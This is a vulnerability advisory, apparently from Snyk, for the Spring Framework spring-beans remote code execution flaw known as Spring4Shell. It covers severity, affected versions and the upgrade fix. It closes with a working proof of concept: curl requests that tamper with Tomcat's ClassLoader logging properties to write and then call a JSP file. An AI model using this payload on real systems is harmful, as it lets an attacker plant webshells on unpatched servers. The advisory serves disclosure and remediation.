Remote Code Execution Affecting org.springframework:spring-beans package, versions [ ,5.2.20) [5.3.0, 5.3.18)


0.0
critical

Snyk CVSS

    Exploit Maturity Mature
    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751
  • published 30 Mar 2022
  • disclosed 30 Mar 2022
  • credit Unknown

How to fix?

Upgrade org.springframework:spring-beans to version 5.2.20, 5.3.18 or higher.

Overview

org.springframework:spring-beans is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.

Affected versions of this package are vulnerable to Remote Code Execution via manipulation of ClassLoader that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).

Note:

  • Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish.

  • However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well.

  • As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed spring-beans version regardless of the application configuration.

Update Log

  • 31/03/2022 - Severity was raised from 8.1 to 9.8
  • 08/04/2022 - Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish).

PoC

1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0
2/ ./mvnw install
3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps
4/ curl -X POST \
  -H "pre:<%" \
  -H "post:;%>" \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \
  -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \
  http://localhost:8888/handling-form-submission-complete/greeting
5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp